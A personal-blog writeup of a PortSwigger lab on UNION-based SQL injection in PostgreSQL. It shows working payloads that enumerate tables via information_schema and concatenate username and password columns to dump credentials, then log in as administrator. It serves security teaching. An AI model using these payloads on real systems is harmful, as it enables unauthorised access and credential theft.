siunam's Website

My personal website

Home Writeups Blog Projects About E-Portfolio

SQL injection attack, listing the database contents on non-Oracle databases | Dec 5, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: SQL injection attack, listing the database contents on non-Oracle databases! Without further ado, let’s dive in.

Background

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the administrator user.

Exploitation

Home page:

In the previous labs, we found an SQL injection vulnerability in the product category filter:

And we found there are 2 columns in the current table, and both columns are accepting string data type.

To extract the username and password of all users, I’ll:

' UNION SELECT NULL,version()-- -

Then we can list all the table names.

' UNION SELECT NULL,table_name FROM information_schema.tables-- -

That’s way too many tables. Let’s exclude all the pg tables, which is the PostgreSQL default tables.

' UNION SELECT NULL,table_name FROM information_schema.tables WHERE table_name NOT LIKE '%pg%'-- -

After some filtering, I found the users_zmlpng table look sussy. Let’s list all column names of this table.

It has 2 columns: username_hrympe and password_gxucte. Let’s extract those data!

' UNION SELECT NULL,username_hrympe||':'||password_gxucte FROM users_zmlpng-- -

We found administrator password!

Let’s login as administrator!

We’re user administrator!!

What we’ve learned:

  1. SQL injection attack, listing the database contents on non-Oracle databases